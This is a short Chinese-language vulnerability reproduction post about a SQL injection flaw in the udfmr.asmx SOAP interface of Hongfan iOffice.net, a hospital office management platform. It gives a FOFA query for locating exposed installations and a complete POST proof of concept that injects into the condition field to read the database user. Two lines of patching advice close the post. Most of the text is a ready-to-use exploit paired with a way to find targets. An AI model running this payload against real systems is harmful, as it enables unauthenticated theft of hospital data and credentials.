0x01 產品簡介?

? ? 紅帆iOffice.net從最早滿足醫院行政辦公需求（傳統OA），到目前融合了衛生主管部門的管理規范和眾多行業特色應用，是目前唯一定位于解決醫院綜合業務管理的軟件，是最符合醫院行業特點的醫院綜合業務管理平臺，是成功案例最多的醫院綜合業務管理軟件。

0x02 漏洞概述

??紅帆iOffice.net?udfmr.asmx接口處存在SQL注入漏洞，未經身份認證的攻擊者可通過該漏洞獲取數據庫敏感信息及憑證，最終可能導致服務器失陷。

0x03?復現環境

FOFA：app="紅帆-ioffice"

?0x04 漏洞復現

http://your-ip/iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch

?出現以上這種情況則可能存在漏洞

PoC

POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr"><condition>1=user_name()</condition></GetEmpSearch></soap:Body>
</soap:Envelope>

查詢當前數據庫用戶?

?0x05 修復建議

?限制訪問來源地址，如非必要，不要將系統開放在互聯網上。

?升級至安全版本或打補丁。